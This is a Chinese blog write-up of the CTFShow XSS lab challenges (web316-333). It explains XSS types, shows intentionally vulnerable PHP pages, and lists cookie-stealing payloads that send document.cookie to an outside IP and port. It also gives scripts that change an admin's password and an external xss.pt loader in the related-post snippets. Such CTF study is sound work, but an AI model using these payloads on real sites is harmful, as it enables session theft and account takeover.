CTFShow Xss

最新推荐文章于 2024-10-16 10:45:48 发布
原创 最新推荐文章于 2024-10-16 10:45:48 发布 · 1.5k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

CTFShow Xss(记录学习)

简单介绍一下Xss

跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
xss漏洞关键就是寻找参数未过滤的输出函数。
常见的输出函数有: echo printf print print_r sprintf die var-dump var_export

xss 分类:(三类)

反射型XSS<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。

存储型XSS<持久化> 代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,
那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie

DOMXSS:基于文档对象模型Document Objeet Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。
DOM中有很多对象,其中一些是用户可以操纵的,如uRI ,location,refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,
如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。

漏洞原理

1.Xss反射型

举个简单地例子:

<html>
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>XSS</title> 
</head> 
<body> 
<form action="" method="get"> 
<input type="text" name="input">     
<input type="submit"> 
</form> 
<br> 
<?php 
$Xss = $_GET['input'];
echo 'output:<br>'.$Xss;
?> 
</body> 
</html> 
获取 get 方式传递的变量名为 input 的变量值(值为一个字符串),然后直接通过echo()函数输出,这中间并未对用户输入进行任何过滤。

在这里插入图片描述
如果在这里插入JavaScript代码会怎么样
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
代码被执行弹窗,这个弹窗并没有什么实际的意义,但通过它我们知道输入javascript代码是可以被执行的,当我们输入一些其他函数,比如document.cookie就可以成功盗取用户的cookie信息,或者读取用户浏览器信息等,为我们进一步深入攻击做铺垫。

web316-326(反射型)

在这里插入图片描述
题目的意思就是我们生成Xss链接盗取cookie,后台会有机器人自动点击
这里收集了一些可以用的姿势

<script>window.open('http://你的公网ip:端口号/'+document.cookie)</script>

<script>var img = document.createElement("img");img.src = "http://你的公网ip:端口号/?cookie="+document.cookie;</script>

<script>window.location.href='http://你的公网ip:端口号/'+document.cookie</script>

<script>location.href='http://你的公网ip:端口号/'+document.cookie</script>

<input onfocus="window.open('http://你的公网ip:端口号/'+document.cookie)" autofocus>

<svg onload="window.open('http://你的公网ip:端口号/'+document.cookie)">

<iframe onload="window.open('http://你的公网ip:端口号/'+document.cookie)"></iframe>

<body onload="window.open('http://你的公网ip:端口号/'+document.cookie)">

这个就是成功了的样子
在这里插入图片描述
如果是这样的那就可能是你在自己Xss自己了
在这里插入图片描述

小总结

就上面这几道反射型XSS的题目来说,无非就是变换标签结合各种编码去绕过,过滤空格就用 \ , 关键字被过滤就双写或编码

2.Xss存储型

和反射性XSS的即时响应相比,存储型XSS则需要先把利用代码保存在比如数据库或文件中,当web程序读取利用代码时再输出在页面上执行利用代码。但存储型XSS不用考虑绕过浏览器的过滤问题,屏蔽性也要好很多
在这里插入图片描述

    <span style="font-size:18px;"><meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>  
    <html>  
    <head>  
    <title>Xss</title>  
    </head>  
    <body>  
    <h2>Message Board<h2>  
    <br>
    <form action="000.php" method="post">  
    Message:<textarea id='Mid' name="desc"></textarea>  
    <br>  
    <br>  
    Subuser:<input type="text" name="user"/><br> 
    <br>
    <input type="submit" value="submit" onclick='loction="000.php"'/>  
    </form>  
    <?php  
    if(isset($_POST['user'])&&isset($_POST['desc'])){  
    $log=fopen("xss.txt","a");  
    fwrite($log,$_POST['user']."\r\n");  
    fwrite($log,$_POST['desc']."\r\n");  
    fclose($log);  
    }  
    if(file_exists("xss.txt"))  
    {  
    $read= fopen("xss.txt",'r');  
    while(!feof($read))  
    {  
        echo fgets($read)."</br>";  
    }  
    fclose($read);  
    }  
    ?>  
    </body>  
    </html></span>  
采用POST提交数据,生成、读取文本模拟数据库,提交数据之后页面会将数据写入xss.txt,
再打开页面时会读取xss.txt中内容并显示在网页上,实现了存储型xss攻击模拟。

可以看见输入的值被储存了起来,如果刷新页面内容会被反复读取写入
在这里插入图片描述
同样的如果写入恶意代码,那么每次刷新页面同样也会被执行,每当有用户访问这个界面都会被Xss攻击,这就是储存型Xss的危害
在这里插入图片描述
在这里插入图片描述

web327

在这里插入图片描述
同样还是想办法盗取admin的cookie,一封钓鱼邮件搞定哈哈哈
在这里插入图片描述
在这里插入图片描述

web328

在这里插入图片描述
随意注册一个号看看,猜测估计是要变成管理员登录
在这里插入图片描述

这个作为密码去注册,当管理员加载这个密码时,他的cookie就被我们盗取了
<script>window.open('http://101.132.104.114:2333/'+document.cookie)</script>

再用这个cookie去假冒管理员登录
在这里插入图片描述
看到管理员的密码也在这里,哈哈哈
在这里插入图片描述

web329

还是和上题一样盗取cookie看看,结果发现并不能顺利的登录,又重新抓取cookie会发现每次都不一样,这是为什么呢。
其实这就好比管理员点击完链接以后就立马注销掉账号,使得cookie失效。
在这里插入图片描述
在这里插入图片描述
居然用cookie登录不行,那就在他点击链接的时候把想要的内容拿到就行了
在这里插入图片描述

因为对js并不熟悉,也是现学现卖的,写的不好哈哈哈拿到flag
<script>window.open('http://101.132.104.114:2333/'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>

在这里插入图片描述

web330

在这里插入图片描述
和之前相比多了一个修改密码,猜测是要想办法修改管理员的密码然后登录
我自己注册了几个账号也试了好久,害,看了一眼大佬们的博客一下就明白了
修改密码抓个包在这里插入图片描述
那就也模仿这样写个js去执行修改管理员密码

<script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>

就是这里有个坑,js代码写在密码里不会再被执行了,这次要写在账号里,然后也注意到这次flag没有在下面的框框里了
在这里插入图片描述

web331

这里和上面类似,只是这次用的是POST方法
在这里插入图片描述
这次用ajax来进行修改密码,不会写js模仿题目的来
在这里插入图片描述

<script>$.ajax({url:'api/change.php',type:'post',data:{p:123}});</script>

web332

现在开始变得有趣了,可以互相骗钱买flag哈哈哈
在这里插入图片描述
给自己转一个负数的钱真的会扣钱,但在创一个号给我转一个负数的钱那他就会加钱,这就是一个逻辑的漏洞
在这里插入图片描述
在这里插入图片描述

web333

还是类似的方法,只是这次加了一点限制,就是转出的金额的绝对值不能比余额大,无非就是多转几次。

然后预期解其实是让管理员给我们转钱,哈哈哈,感觉太麻烦就不写了

总结

Xss也就先告一段落了,js 还要花时间去学习一下,很多东西不知道是什么 怎么利用,继续挨打

CTFshow XSS(web316-333)
Kradress的博客
03-18 980
这里我们发现管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码。这题没有过滤什么,但是如果用img的话,拿不到flag,但是referer是bot,我猜测bot触发不了img的。试试用admin的cookie修改密码,但是没有用,可能cookie失效了。这题拿cookie也看不到flag了,不过多了一个修改密码选项。随便注册一个用户test,余额只有6块,买flag要9999元。发现输出为空,说明被题目限制了,但是。可以用frame注入。
ctfshow XSS
quan9i的博客
06-28 1675
ctfshow XSS 316-333
CTFSHOW-XSS
byname1的博客
03-10 1200
说来惭愧,很久没发博客了,主要是寒假有点摆了,然后ctfshow很多类型我在同时刷,这几天比如sql,xxe,php反序列化,jwt这些我就陆陆续续地能发出来了。文末有参考WP,这两篇WP对于没学过JS的我做题用处很大,先谢过Y4师傅和bfeng师傅了!!!
CTFshow——XSS
D.MIND 的博客
04-01 696
文章目录web316web317——过滤了scriptweb318——过滤了imgweb319——web320、321、322——过滤空格 web316 利用xss平台里的代码进行攻击: https://xss.pt/xss.php <sCRiPt sRC=//xss.pt/kUIB></sCrIpT> web317——过滤了script <img src=x onerror=s=createElement('script');body.appendChild(s);s.sr
ctfshow xss
07-31
CTFShow是一个网络安全工具,它主要用于检测网页是否存在跨站脚本攻击(XSS)漏洞。XSS(Cross-Site Scripting)是指攻击者通过恶意注入可以执行的JavaScript或其他客户端脚本到网站上,当用户浏览包含这些脚本的页面...
ctfshow xss328
最新发布
01-29
### 关于 CTFShow 平台中的 XSS 挑战题解 对于编号为 xss328 的跨站脚本攻击(XSS)挑战,在解决此类问题时通常需要考虑如何利用反射型或存储型 XSS 漏洞来执行恶意脚本。虽然特定题目细节未提供,但一般而言,这类...
ctfshowXSS
njh18790816639的博客
05-19 419
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 大致的介绍一下XSS漏洞!此时我们可以使用这个xss平台***https://xss.pt/xss.php*** 注.
ctfshow-xss(web316-web330)
m0_72125469的博客
07-03 1673
web317讲解相当细致精致练习XSSweb316这道题估计陆陆续续弄了半天 因为xss可以说基本不会 还好最终彻彻底底明白了首先这道题是反射性xss 也就是必须点击某一个xss链接 才能达到xss效果这道题的意思就是 写一个祝福语生成链接发送给朋友 这个祝福语的位置就是我们实现XSS的位置已知:flag在BOT(程序,机器人)的cookie中并且 生成的链接后端BOT会每隔一段时间访问所以 要构造一个含有XSS的链接 使得管理员只要访问就能获取BOT的cookie。
ctfshow——XSS
qq_55202378的博客
04-24 1660
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS。恶意攻击者往 WEB 页面里插入恶意 HTML 代码,当用户浏览该页之时,嵌入其中 Web 里面的 HTML 代码会被执行,从而达到恶意攻击用户的特殊目的。
CTFShow Web 入门 XSS
tj13995958709的博客
04-14 2701
这一题用上一题的做法就不行,这一题admin的cookie是一直在变的,而且很快,看到此题还有修改密码的功能,注册个普通账号,在修改密码时抓包。当将这行脚本代码提交后,稍等片刻,会有个类似admin管理员的程序每隔一段时间就查看我们提交的连接,然后就可以拿到admin的cookie。这道题它代码逻辑有问题,转账的不扣转账方的金额,所以可以一直向自己转账,转的金额不超过自己余额即可。直接让admin转自己10000,和上题让admin自己改密码思路是一样的。然后登录admin账号,密码输入123456。
CTFSHOW xss
羽的博客
12-28 9642
web316 xss平台 https://xss.pt/xss.php 创建项目 选择默认模块 一直下一步,然后随便那个代码放到题目输入框中 再刷新下题目 最后看下项目 结束
ctfshow-web[XSS]
m0_72898152的博客
02-04 1072
ctfshow
ctfshow XSS专题
yink12138的博客
12-17 1652
ctfshow XSS专题
ctf.show之XSS(跨站脚本攻击)
weixin_68477635的博客
10-16 288
XSS被称为跨站脚本攻击(Cross Site Scripting),由于和层叠样式表(Cascading Style Sheets,CSS)重名,改为XSS主要基于JavaSript语言进行恶意攻击,因为js非常灵活操作html、css、浏览器。
ctfshow web入门 xss(持续更新)
Lum1n0us's Blog
08-07 670
文章目录前言web316web317web318-319web320-325 前言 因为各种各样的问题,我这里就只让他弹窗,而不把获取flag作为目标了 web316 第一关,很简单,没有过滤,直接 <script>alert(0)</script> 就能弹窗 web317 有过滤了,可能是把script过滤了,可以用img标签 <img src=1 onerror=alert(0)> web318-319 img标签也被过滤了,可以用body标签,它被ban的概率比
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值